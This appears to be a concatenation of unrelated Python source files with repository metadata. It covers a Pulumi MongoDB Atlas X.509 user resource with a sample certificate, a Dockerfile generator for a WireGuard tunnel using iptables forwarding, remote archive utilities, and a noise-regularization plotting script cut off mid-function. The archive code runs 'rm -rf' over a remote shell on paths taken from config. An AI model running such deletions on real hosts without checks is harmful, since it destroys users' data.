MDQ2MDFaFw0yMTAyMDMyMDQ2MDFaMIGQMQswCQYDVQQGEwJVUzEOMAwGA1UECAwF
VGV4YXMxDzANBgNVBAcMBkF1c3RpbjERMA8GA1UECgwIdGVzdC5jb20xDTALBgNV
BAsMBFRlc3QxETAPBgNVBAMMCHRlc3QuY29tMSswKQYJKoZIhvcNAQkBFhxtZWxp
c3NhLnBsdW5rZXR0QG1vbmdvZGIuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB
iQKBgQCf1LRqr1zftzdYx2Aj9G76tb0noMPtj6faGLlPji1+m6Rn7RWD9L0ntWAr
cURxvypa9jZ9MXFzDtLevvd3tHEmfrUT3ukNDX6+Jtc4kWm+Dh2A70Pd+deKZ2/O
Fh8audEKAESGXnTbeJCeQa1XKlIkjqQHBNwES5h1b9vJtFoLJwIDAQABMA0GCSqG
SIb3DQEBCwUAA4GBADMUncjEPV/MiZUcVNGmktP6BPmEqMXQWUDpdGW2+Tg2JtUA
7MMILtepBkFzLO+GlpZxeAlXO0wxiNgEmCRONgh4+t2w3e7a8GFijYQ99FHrAC5A
iul59bdl18gVqXia1Yeq/iK7Ohfy/Jwd7Hsm530elwkM/ZEkYDjBlZSXYdyz
-----END CERTIFICATE-----"
\"\"\",
project_id="<PROJECT-ID>")
```
## Import
X.509 Certificates for a User can be imported using project ID and username, in the format `project_id-username`, e.g.
```sh
$ pulumi import mongodbatlas:index/x509AuthenticationDatabaseUser:X509AuthenticationDatabaseUser test 1112222b3bf99403840e8934-myUsername
```
For more information see[MongoDB Atlas API Reference.](https://docs.atlas.mongodb.com/reference/api/x509-configuration-get-certificates/) Current X.509 Configuration can be imported using project ID, in the format `project_id`, e.g.
```sh
$ pulumi import mongodbatlas:index/x509AuthenticationDatabaseUser:X509AuthenticationDatabaseUser test 1112222b3bf99403840e8934
```
For more information see[MongoDB Atlas API Reference.](https://docs.atlas.mongodb.com/reference/api/x509-configuration-get-certificates/)
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] customer_x509_cas: PEM string containing one or more customer CAs for database user authentication.
:param pulumi.Input[int] months_until_expiration: A number of months that the created certificate is valid for before expiry, up to 24 months. By default is 3.
:param pulumi.Input[str] project_id: Identifier for the Atlas project associated with the X.509 configuration.
:param pulumi.Input[str] username: Username of the database user to create a certificate for.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: X509AuthenticationDatabaseUserArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
`X509AuthenticationDatabaseUser` provides a X509 Authentication Database User resource. The X509AuthenticationDatabaseUser resource lets you manage MongoDB users who authenticate using X.509 certificates. You can manage these X.509 certificates or let Atlas do it for you.
| Management | Description |
|---|---|
| Atlas | Atlas manages your Certificate Authority and can generate certificates for your MongoDB users. No additional X.509 configuration is required. |
| Customer | You must provide a Certificate Authority and generate certificates for your MongoDB users. |
> **NOTE:** Groups and projects are synonymous terms. You may find group_id in the official documentation.
## Example Usage
### S
### Example Usage: Generate an Atlas-managed X.509 certificate for a MongoDB user
```python
import pulumi
import pulumi_mongodbatlas as mongodbatlas
user = mongodbatlas.DatabaseUser("user",
project_id="<PROJECT-ID>",
username="myUsername",
x509_type="MANAGED",
database_name="$external",
roles=[mongodbatlas.DatabaseUserRoleArgs(
role_name="atlasAdmin",
database_name="admin",
)],
labels=[mongodbatlas.DatabaseUserLabelArgs(
key="My Key",
value="My Value",
)])
test = mongodbatlas.X509AuthenticationDatabaseUser("test",
project_id=user.project_id,
username=user.username,
months_until_expiration=2)
```
### Example Usage: Save a customer-managed X.509 configuration for an Atlas project
```python
import pulumi
import pulumi_mongodbatlas as mongodbatlas
test = mongodbatlas.X509AuthenticationDatabaseUser("test",
customer_x509_cas=\"\"\" -----BEGIN CERTIFICATE-----
MIICmTCCAgICCQDZnHzklxsT9TANBgkqhkiG9w0BAQsFADCBkDELMAkGA1UEBhMC
VVMxDjAMBgNVBAgMBVRleGFzMQ8wDQYDVQQHDAZBdXN0aW4xETAPBgNVBAoMCHRl
c3QuY29tMQ0wCwYDVQQLDARUZXN0MREwDwYDVQQDDAh0ZXN0LmNvbTErMCkGCSqG
SIb3DQEJARYcbWVsaXNzYS5wbHVua2V0dEBtb25nb2RiLmNvbTAeFw0yMDAyMDQy
MDQ2MDFaFw0yMTAyMDMyMDQ2MDFaMIGQMQswCQYDVQQGEwJVUzEOMAwGA1UECAwF
VGV4YXMxDzANBgNVBAcMBkF1c3RpbjERMA8GA1UECgwIdGVzdC5jb20xDTALBgNV
BAsMBFRlc3QxETAPBgNVBAMMCHRlc3QuY29tMSswKQYJKoZIhvcNAQkBFhxtZWxp
c3NhLnBsdW5rZXR0QG1vbmdvZGIuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB
iQKBgQCf1LRqr1zftzdYx2Aj9G76tb0noMPtj6faGLlPji1+m6Rn7RWD9L0ntWAr
cURxvypa9jZ9MXFzDtLevvd3tHEmfrUT3ukNDX6+Jtc4kWm+Dh2A70Pd+deKZ2/O
Fh8audEKAESGXnTbeJCeQa1XKlIkjqQHBNwES5h1b9vJtFoLJwIDAQABMA0GCSqG
SIb3DQEBCwUAA4GBADMUncjEPV/MiZUcVNGmktP6BPmEqMXQWUDpdGW2+Tg2JtUA
7MMILtepBkFzLO+GlpZxeAlXO0wxiNgEmCRONgh4+t2w3e7a8GFijYQ99FHrAC5A
iul59bdl18gVqXia1Yeq/iK7Ohfy/Jwd7Hsm530elwkM/ZEkYDjBlZSXYdyz
-----END CERTIFICATE-----"
\"\"\",
project_id="<PROJECT-ID>")
```
## Import
X.509 Certificates for a User can be imported using project ID and username, in the format `project_id-username`, e.g.
```sh
$ pulumi import mongodbatlas:index/x509AuthenticationDatabaseUser:X509AuthenticationDatabaseUser test 1112222b3bf99403840e8934-myUsername
```
For more information see[MongoDB Atlas API Reference.](https://docs.atlas.mongodb.com/reference/api/x509-configuration-get-certificates/) Current X.509 Configuration can be imported using project ID, in the format `project_id`, e.g.
```sh
$ pulumi import mongodbatlas:index/x509AuthenticationDatabaseUser:X509AuthenticationDatabaseUser test 1112222b3bf99403840e8934
```
For more information see[MongoDB Atlas API Reference.](https://docs.atlas.mongodb.com/reference/api/x509-configuration-get-certificates/)
:param str resource_name: The name of the resource.
:param X509AuthenticationDatabaseUserArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(X509AuthenticationDatabaseUserArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
customer_x509_cas: Optional[pulumi.Input[str]] = None,
months_until_expiration: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = X509AuthenticationDatabaseUserArgs.__new__(X509AuthenticationDatabaseUserArgs)
__props__.__dict__["customer_x509_cas"] = customer_x509_cas
__props__.__dict__["months_until_expiration"] = months_until_expiration
if project_id is None and not opts.urn:
raise TypeError("Missing required property 'project_id'")
__props__.__dict__["project_id"] = project_id
__props__.__dict__["username"] = username
__props__.__dict__["certificates"] = None
__props__.__dict__["current_certificate"] = None
super(X509AuthenticationDatabaseUser, __self__).__init__(
'mongodbatlas:index/x509AuthenticationDatabaseUser:X509AuthenticationDatabaseUser',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
certificates: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['X509AuthenticationDatabaseUserCertificateArgs']]]]] = None,
current_certificate: Optional[pulumi.Input[str]] = None,
customer_x509_cas: Optional[pulumi.Input[str]] = None,
months_until_expiration: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None) -> 'X509AuthenticationDatabaseUser':
"""
Get an existing X509AuthenticationDatabaseUser resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['X509AuthenticationDatabaseUserCertificateArgs']]]] certificates: Array of objects where each details one unexpired database user certificate.
:param pulumi.Input[str] current_certificate: Contains the last X.509 certificate and private key created for a database user.
:param pulumi.Input[str] customer_x509_cas: PEM string containing one or more customer CAs for database user authentication.
:param pulumi.Input[int] months_until_expiration: A number of months that the created certificate is valid for before expiry, up to 24 months. By default is 3.
:param pulumi.Input[str] project_id: Identifier for the Atlas project associated with the X.509 configuration.
:param pulumi.Input[str] username: Username of the database user to create a certificate for.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _X509AuthenticationDatabaseUserState.__new__(_X509AuthenticationDatabaseUserState)
__props__.__dict__["certificates"] = certificates
__props__.__dict__["current_certificate"] = current_certificate
__props__.__dict__["customer_x509_cas"] = customer_x509_cas
__props__.__dict__["months_until_expiration"] = months_until_expiration
__props__.__dict__["project_id"] = project_id
__props__.__dict__["username"] = username
return X509AuthenticationDatabaseUser(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def certificates(self) -> pulumi.Output[Sequence['outputs.X509AuthenticationDatabaseUserCertificate']]:
"""
Array of objects where each details one unexpired database user certificate.
"""
return pulumi.get(self, "certificates")
@property
@pulumi.getter(name="currentCertificate")
def current_certificate(self) -> pulumi.Output[str]:
"""
Contains the last X.509 certificate and private key created for a database user.
"""
return pulumi.get(self, "current_certificate")
@property
@pulumi.getter(name="customerX509Cas")
def customer_x509_cas(self) -> pulumi.Output[Optional[str]]:
"""
PEM string containing one or more customer CAs for database user authentication.
"""
return pulumi.get(self, "customer_x509_cas")
@property
@pulumi.getter(name="monthsUntilExpiration")
def months_until_expiration(self) -> pulumi.Output[Optional[int]]:
"""
A number of months that the created certificate is valid for before expiry, up to 24 months. By default is 3.
"""
return pulumi.get(self, "months_until_expiration")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Output[str]:
"""
Identifier for the Atlas project associated with the X.509 configuration.
"""
return pulumi.get(self, "project_id")
@property
@pulumi.getter
def username(self) -> pulumi.Output[Optional[str]]:
"""
Username of the database user to create a certificate for.
"""
return pulumi.get(self, "username")
| 49.048
| 280
| 0.689692
| 2,525
| 24,524
| 6.504951
| 0.107327
| 0.049559
| 0.040061
| 0.037504
| 0.85175
| 0.833486
| 0.8193
| 0.798052
| 0.786362
| 0.773272
| 0
| 0.033873
| 0.227165
| 24,524
| 499
| 281
| 49.146293
| 0.832744
| 0.483241
| 0
| 0.647619
| 1
| 0
| 0.135083
| 0.061551
| 0
| 0
| 0
| 0
| 0
| 1
| 0.157143
| false
| 0.004762
| 0.033333
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8d389a141552824fec04e31d4dc97310a6a46c0f
| 1,824
|
py
|
Python
|
client/gefyra/local/cargoimage/Dockerfile.py
|
gefyrahq/gefyra
|
0bc205b4b01100c640081ead671bdb195761299b
|
[
"Apache-2.0"
] | 41
|
2022-03-24T15:45:56.000Z
|
2022-03-31T08:07:19.000Z
|
client/gefyra/local/cargoimage/Dockerfile.py
|
Schille/gefyra
|
43abd17b8ed5867a26266b5e7a5d6f9edfebab4a
|
[
"Apache-2.0"
] | 23
|
2021-12-02T10:29:09.000Z
|
2022-03-17T18:10:57.000Z
|
client/gefyra/local/cargoimage/Dockerfile.py
|
Schille/gefyra
|
43abd17b8ed5867a26266b5e7a5d6f9edfebab4a
|
[
"Apache-2.0"
] | 3
|
2022-02-18T21:16:10.000Z
|
2022-03-09T22:46:28.000Z
|
# flake8: noqa
import io
import sys
def get_dockerfile(cargo_image):
if sys.platform == "win32":
return io.BytesIO(
f"""
FROM {cargo_image}
RUN patch /usr/bin/wg-quick /wgquick.patch
ARG ADDRESS
ARG PRIVATE_KEY
ARG DNS
ARG PUBLIC_KEY
ARG ENDPOINT
ARG ALLOWED_IPS
RUN echo '[Interface] \\n\
Address = '"$ADDRESS"' \\n\
PrivateKey = '"$PRIVATE_KEY"' \\n\
DNS = '"$DNS"' \\n\
PreUp = sysctl -w net.ipv4.ip_forward=1 \\n\
PostUp = iptables -A FORWARD -i %i -j ACCEPT; iptables -A FORWARD -o %i -j ACCEPT; iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE \\n\
PostDown = iptables -D FORWARD -i %i -j ACCEPT; iptables -D FORWARD -o %i -j ACCEPT; iptables -t nat -D POSTROUTING -o eth1 -j MASQUERADE \\n\
\\n\
[Peer] \\n\
PublicKey = '"$PUBLIC_KEY"' \\n\
Endpoint = '"$ENDPOINT"' \\n\
PersistentKeepalive = 21 \\n\
AllowedIPs = '"$ALLOWED_IPS" > /config/wg0.conf
RUN cat /config/wg0.conf
""".encode(
"utf-8"
)
)
else:
return io.BytesIO(
f"""
FROM {cargo_image}
ARG ADDRESS
ARG PRIVATE_KEY
ARG DNS
ARG PUBLIC_KEY
ARG ENDPOINT
ARG ALLOWED_IPS
RUN echo '[Interface] \\n\
Address = '"$ADDRESS"' \\n\
PrivateKey = '"$PRIVATE_KEY"' \\n\
DNS = '"$DNS"' \\n\
PreUp = sysctl -w net.ipv4.ip_forward=1 \\n\
PostUp = iptables -A FORWARD -i %i -j ACCEPT; iptables -A FORWARD -o %i -j ACCEPT; iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE \\n\
PostDown = iptables -D FORWARD -i %i -j ACCEPT; iptables -D FORWARD -o %i -j ACCEPT; iptables -t nat -D POSTROUTING -o eth1 -j MASQUERADE \\n\
\\n\
[Peer] \\n\
PublicKey = '"$PUBLIC_KEY"' \\n\
Endpoint = '"$ENDPOINT"' \\n\
PersistentKeepalive = 21 \\n\
AllowedIPs = '"$ALLOWED_IPS" > /config/wg0.conf
RUN cat /config/wg0.conf
""".encode(
"utf-8"
)
)
| 26.057143
| 142
| 0.625
| 268
| 1,824
| 4.186567
| 0.268657
| 0.01426
| 0.057041
| 0.114082
| 0.903743
| 0.903743
| 0.903743
| 0.850267
| 0.850267
| 0.850267
| 0
| 0.014685
| 0.216009
| 1,824
| 69
| 143
| 26.434783
| 0.76993
| 0.006579
| 0
| 0.833333
| 0
| 0.066667
| 0.839779
| 0.023204
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016667
| false
| 0
| 0.033333
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8d5d1187d7f404f05857a317c0c078a3e68e3acc
| 2,773
|
py
|
Python
|
utils/archive/archive.py
|
jiafeiyan/xops
|
fba70cc5282a040ae5f2f1266b86e12dd54edd65
|
[
"Apache-2.0"
] | 1
|
2018-01-22T06:38:06.000Z
|
2018-01-22T06:38:06.000Z
|
utils/archive/archive.py
|
jiafeiyan/my_python_util
|
fba70cc5282a040ae5f2f1266b86e12dd54edd65
|
[
"Apache-2.0"
] | null | null | null |
utils/archive/archive.py
|
jiafeiyan/my_python_util
|
fba70cc5282a040ae5f2f1266b86e12dd54edd65
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: UTF-8 -*-
import sys
from utils import Configuration, parse_conf_args, rshell
def clear_after_archive(context, conf):
hosts_config = context.get("hosts")
archive_configs = conf.get("Archives")
for archive_config in archive_configs:
host_id = archive_config.get("host")
host_config = hosts_config.get(host_id)
rsh = rshell(host_config)
rsh.connect()
items = archive_config.get("items")
for item in items:
base_dir = item.get("basedir", None)
if base_dir is not None:
stdin, stdout, stderr = rsh.execute("cd %s" % (base_dir,))
error = stderr.read()
if error is not "":
sys.stderr.write("Error: %s\n" % (error,))
source_files_str = item.get("sources")
target_file_str = item.get("target")
stdin, stdout, stderr = rsh.execute("rm -rf %s" %(source_files_str,))
error = stderr.read()
if error is not "":
sys.stderr.write("Error: %s\n" % (error,))
rsh.disconnect()
def tar_archive(context, conf):
hosts_config = context.get("hosts")
archive_configs = conf.get("Archives")
for archive_config in archive_configs:
host_id = archive_config.get("host")
host_config = hosts_config.get(host_id)
rsh = rshell(host_config)
rsh.connect()
items = archive_config.get("items")
for item in items:
base_dir = item.get("basedir", None)
if base_dir is not None:
stdin, stdout, stderr = rsh.execute("cd %s" % (base_dir,))
error = stderr.read()
if error is not "":
sys.stderr.write("Error: %s\n" % (error,))
source_files_str = item.get("sources")
target_file_str = item.get("target")
stdin, stdout, stderr = rsh.execute("tar -czvf %s %s" %(target_file_str, source_files_str))
error = stderr.read()
if error is not "":
sys.stderr.write("Error: %s\n" % (error,))
rsh.disconnect()
def zip_archive(conf):
hosts_config = conf.get("hosts")
archive_config = conf.get("Archives")
archive_groups = archive_config.get("groups")
for group in archive_groups:
host_id = group.get("host")
host_config = hosts_config.get(host_id)
source_files_str = group.get("sources")
target_file_str = group.get("target")
rsh = rshell(host_config)
rsh.connect()
rsh.execute("zip -ru %s %s" %(target_file_str, source_files_str))
rsh.disconnect()
| 30.811111
| 104
| 0.556076
| 333
| 2,773
| 4.432432
| 0.186186
| 0.070461
| 0.056911
| 0.054201
| 0.804201
| 0.788618
| 0.76897
| 0.76897
| 0.73916
| 0.714092
| 0
| 0.000532
| 0.322395
| 2,773
| 89
| 105
| 31.157303
| 0.784992
| 0.007573
| 0
| 0.754098
| 0
| 0
| 0.079294
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04918
| false
| 0
| 0.032787
| 0
| 0.081967
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8d9bffbd2bde85f819429801b8176f6cb51909ef
| 51,408
|
py
|
Python
|
experiments/Plotting/plot_noise_regularization_results.py
|
j-geuter/CINDy
|
65144db43d461d70baaeb3252dd650a0be68f060
|
[
"MIT"
] | 1
|
2021-11-08T10:14:42.000Z
|
2021-11-08T10:14:42.000Z
|
experiments/Plotting/plot_noise_regularization_results.py
|
j-geuter/CINDy
|
65144db43d461d70baaeb3252dd650a0be68f060
|
[
"MIT"
] | null | null | null |
experiments/Plotting/plot_noise_regularization_results.py
|
j-geuter/CINDy
|
65144db43d461d70baaeb3252dd650a0be68f060
|
[
"MIT"
] | 1
|
2022-03-31T12:42:42.000Z
|
2022-03-31T12:42:42.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 1 14:51:09 2020
@author: pccom
"""
import os, sys
sys.path.append("..")
from auxiliary_functions import load_pickled_object
import numpy as np
from scipy.interpolate import griddata
import matplotlib.pyplot as plt
import numpy.ma as ma
from numpy.random import uniform, seed
import matplotlib as mpl
mpl.rcParams["pdf.fonttype"] = 42
mpl.rcParams["ps.fonttype"] = 42
fontsize = 19
fontsize_legend = 13
# data = load_pickled_object(os.path.join(os.getcwd(), 'results_kuramoto_L1reg.pickle'))
default_names = [
"BCG",
"BCG_constraint",
"BCG_integral",
"BCG_integral_constraint",
"CVXOPT",
"CVXOPT_constraint",
"CVXOPT_integral",
"CVXOPT_integral_constraint",
"FISTA",
"FISTA_integral",
"SINDy",
"SINDy_integral",
]
def load_files_and_compute_metrics(file_directory, algorithm_names=default_names):
# Create the structure of the dataframe with the first file
file_data = load_pickled_object(
os.path.join(file_directory, os.listdir(file_directory)[0])
)
data = {
"noise": file_data["noise"],
}
num_noise_levels = len(file_data["noise"])
exact_dynamic = file_data["exact_dynamic"]
# Compute the recovery metric for CINDy.
algorithm_names
for file in os.listdir(file_directory):
file_data = load_pickled_object(os.path.join(file_directory, file))
exact_dynamic = file_data["exact_dynamic"]
for name in algorithm_names:
data = compute_individual_metrics(name, exact_dynamic, data, file_data)
# Training metrics on exact data
metrics = [
np.linalg.norm(Y_matrix - exact_dynamic.dot(matrix))
for Y_matrix, matrix in zip(
file_data["Y_train_data"], file_data["psi_train_data"]
)
]
if "exact_derivative_training" in data:
data["exact_derivative_training"] = np.hstack(
(data["exact_derivative_training"], np.asarray(metrics)[:, np.newaxis])
)
else:
data["exact_derivative_training"] = np.asarray(metrics)[:, np.newaxis]
metrics = [
np.linalg.norm(Y_matrix - exact_dynamic.dot(matrix))
for Y_matrix, matrix in zip(
file_data["delta_train_data"], file_data["matrix_train_data"]
)
]
if "exact_trajectory_training" in data:
data["exact_trajectory_training"] = np.hstack(
(data["exact_trajectory_training"], np.asarray(metrics)[:, np.newaxis])
)
else:
data["exact_trajectory_training"] = np.asarray(metrics)[:, np.newaxis]
# Training metrics on exact data
metrics = [
np.linalg.norm(Y_matrix - exact_dynamic.dot(matrix))
for Y_matrix, matrix in zip(
file_data["Y_validation_data"], file_data["psi_validation_data"]
)
]
if "exact_derivative_validation" in data:
data["exact_derivative_validation"] = np.hstack(
(data["exact_derivative_validation"], np.asarray(metrics)[:, np.newaxis])
)
else:
data["exact_derivative_validation"] = np.asarray(metrics)[:, np.newaxis]
metrics = [
np.linalg.norm(Y_matrix - exact_dynamic.dot(matrix))
for Y_matrix, matrix in zip(
file_data["delta_validation_data"], file_data["matrix_validation_data"]
)
]
if "exact_trajectory_validation" in data:
data["exact_trajectory_validation"] = np.hstack(
(data["exact_trajectory_validation"], np.asarray(metrics)[:, np.newaxis])
)
else:
data["exact_trajectory_validation"] = np.asarray(metrics)[:, np.newaxis]
return data
def compute_individual_metrics(name, exact_dynamic, data, problem_data):
metrics = [
np.linalg.norm(dynamic - exact_dynamic)
for dynamic in problem_data[name + "_dynamic"]
]
if name + "_recovery" in data:
data[name + "_recovery"] = np.hstack(
(data[name + "_recovery"], np.asarray(metrics)[:, np.newaxis])
)
else:
data[name + "_recovery"] = np.asarray(metrics)[:, np.newaxis]
metrics = [
np.linalg.norm((dynamic - exact_dynamic).dot(matrix))
for dynamic, matrix in zip(
problem_data[name + "_dynamic"], problem_data["psi_validation_data"]
)
]
if name + "_derivative" in data:
data[name + "_derivative"] = np.hstack(
(data[name + "_derivative"], np.asarray(metrics)[:, np.newaxis])
)
else:
data[name + "_derivative"] = np.asarray(metrics)[:, np.newaxis]
metrics = [
np.linalg.norm((dynamic - exact_dynamic).dot(matrix))
for dynamic, matrix in zip(
problem_data[name + "_dynamic"], problem_data["matrix_validation_data"]
)
]
if name + "_trajectory" in data:
data[name + "_trajectory"] = np.hstack(
(data[name + "_trajectory"], np.asarray(metrics)[:, np.newaxis])
)
else:
data[name + "_trajectory"] = np.asarray(metrics)[:, np.newaxis]
metrics = [
np.count_nonzero(np.multiply(exact_dynamic == 0.0, dynamic != 0.0))
for dynamic in problem_data[name + "_dynamic"]
]
if name + "_extra" in data:
data[name + "_extra"] = np.hstack(
(data[name + "_extra"], np.asarray(metrics)[:, np.newaxis])
)
else:
data[name + "_extra"] = np.asarray(metrics)[:, np.newaxis]
metrics = [
np.count_nonzero(np.multiply(exact_dynamic != 0.0, dynamic == 0.0))
for dynamic in problem_data[name + "_dynamic"]
]
if name + "_missing" in data:
data[name + "_missing"] = np.hstack(
(data[name + "_missing"], np.asarray(metrics)[:, np.newaxis])
)
else:
data[name + "_missing"] = np.asarray(metrics)[:, np.newaxis]
# Training metrics
metrics = [
np.linalg.norm(Y_matrix - dynamic.dot(matrix))
for dynamic, Y_matrix, matrix in zip(
problem_data[name + "_dynamic"],
problem_data["Y_train_data"],
problem_data["psi_train_data"],
)
]
if name + "_derivative_training" in data:
data[name + "_derivative_training"] = np.hstack(
(data[name + "_derivative_training"], np.asarray(metrics)[:, np.newaxis])
)
else:
data[name + "_derivative_training"] = np.asarray(metrics)[:, np.newaxis]
metrics = [
np.linalg.norm(Y_matrix - dynamic.dot(matrix))
for dynamic, Y_matrix, matrix in zip(
problem_data[name + "_dynamic"],
problem_data["delta_train_data"],
problem_data["matrix_train_data"],
)
]
if name + "_trajectory_training" in data:
data[name + "_trajectory_training"] = np.hstack(
(data[name + "_trajectory_training"], np.asarray(metrics)[:, np.newaxis])
)
else:
data[name + "_trajectory_training"] = np.asarray(metrics)[:, np.newaxis]
# Validation metrics
metrics = [
np.linalg.norm(Y_matrix - dynamic.dot(matrix))
for dynamic, Y_matrix, matrix in zip(
problem_data[name + "_dynamic"],
problem_data["Y_validation_data"],
problem_data["psi_validation_data"],
)
]
if name + "_derivative_validation" in data:
data[name + "_derivative_validation"] = np.hstack(
(data[name + "_derivative_validation"], np.asarray(metrics)[:, np.newaxis])
)
else:
data[name + "_derivative_validation"] = np.asarray(metrics)[:, np.newaxis]
metrics = [
np.linalg.norm(Y_matrix - dynamic.dot(matrix))
for dynamic, Y_matrix, matrix in zip(
problem_data[name + "_dynamic"],
problem_data["delta_validation_data"],
problem_data["matrix_validation_data"],
)
]
if name + "_trajectory_validation" in data:
data[name + "_trajectory_validation"] = np.hstack(
(data[name + "_trajectory_validation"], np.asarray(metrics)[:, np.newaxis])
)
else:
data[name + "_trajectory_validation"] = np.asarray(metrics)[:, np.newaxis]
return data
def cm_to_inch(value):
return value / 2.54
def plot_stochastic(
x_axis,
list_data,
list_legend,
title,
x_label,
y_label,
colors,
markers,
log_x=True,
log_y=True,
fill_between_lines=True,
save_figure=None,
legend_location=None,
outside_legend=False,
):
plt.rcParams.update({"font.size": 19})
# plt.figure(figsize=(cm_to_inch(12),cm_to_inch(14)))
size_marker = 10
for i in range(len(list_data)):
mean = np.mean(list_data[i], axis=1)
std_dev = np.std(list_data[i], axis=1)
if list_legend != []:
if log_x and log_y:
plt.loglog(
x_axis,
mean,
colors[i],
marker=markers[i],
markersize=size_marker,
markerfacecolor="None",
markeredgecolor=colors[i],
markeredgewidth=1,
linewidth=2.0,
label=list_legend[i],
)
if log_x and not log_y:
plt.semilogx(
x_axis,
mean,
colors[i],
marker=markers[i],
markersize=size_marker,
markerfacecolor="None",
markeredgecolor=colors[i],
markeredgewidth=1,
linewidth=2.0,
label=list_legend[i],
)
if not log_x and log_y:
plt.semilogy(
x_axis,
mean,
colors[i],
marker=markers[i],
markersize=size_marker,
markerfacecolor="None",
markeredgecolor=colors[i],
markeredgewidth=1,
linewidth=2.0,
label=list_legend[i],
)
if not log_x and not log_y:
plt.plot(
x_axis,
mean,
colors[i],
marker=markers[i],
markersize=size_marker,
markerfacecolor="None",
markeredgecolor=colors[i],
markeredgewidth=1,
linewidth=2.0,
label=list_legend[i],
)
if fill_between_lines:
plt.fill_between(
x_axis, mean - std_dev, mean + std_dev, color=colors[i], alpha=0.2
)
else:
if log_x and log_y:
plt.loglog(
x_axis,
mean,
colors[i],
marker=markers[i],
markersize=size_marker,
markerfacecolor="None",
markeredgecolor=colors[i],
markeredgewidth=1,
linewidth=2.0,
)
if log_x and not log_y:
plt.semilogx(
x_axis,
mean,
colors[i],
marker=markers[i],
markersize=size_marker,
markerfacecolor="None",
markeredgecolor=colors[i],
markeredgewidth=1,
linewidth=2.0,
)
if not log_x and log_y:
plt.semilogy(
x_axis,
mean,
colors[i],
marker=markers[i],
markersize=size_marker,
markerfacecolor="None",
markeredgecolor=colors[i],
markeredgewidth=1,
linewidth=2.0,
)
if not log_x and not log_y:
plt.plot(
x_axis,
mean,
colors[i],
marker=markers[i],
markersize=size_marker,
markerfacecolor="None",
markeredgecolor=colors[i],
markeredgewidth=1,
linewidth=2.0,
)
if fill_between_lines:
plt.fill_between(
x_axis, mean - std_dev, mean + std_dev, color=colors[i], alpha=0.2
)
plt.title(title, fontsize=fontsize)
plt.ylabel(y_label, fontsize=fontsize)
plt.xlabel(x_label, fontsize=fontsize)
if list_legend != []:
if legend_location is not None:
plt.legend(fontsize=fontsize_legend, loc=legend_location, ncol=2)
else:
if outside_legend:
plt.legend(
fontsize=fontsize_legend, loc="center left", bbox_to_anchor=(1, 0.5)
)
else:
plt.legend(fontsize=fontsize_legend)
plt.tight_layout()
plt.grid(True, which="both")
if save_figure is None:
plt.show()
else:
if ".pdf" in save_figure:
plt.savefig(save_figure, bbox_inches="tight")
if ".png" in save_figure:
plt.savefig(save_figure, dpi=600, format="png", bbox_inches="tight")
# plt.savefig(save_figure)
plt.close()
def plot_stochastic_side_by_side(
x_axis,
list_data_left,
list_data_right,
list_legend,
title_left,
title_right,
x_label,
y_label,
colors,
markers,
linestyle_type=None,
log_x=True,
log_y=True,
fill_between_lines=True,
figure_size=None,
save_figure=None,
legend_location=None,
outside_legend=False,
):
plt.rcParams.update({"font.size": 20})
# plt.figure(figsize=(cm_to_inch(12),cm_to_inch(14)))
size_marker = 10
font_size_title = 30
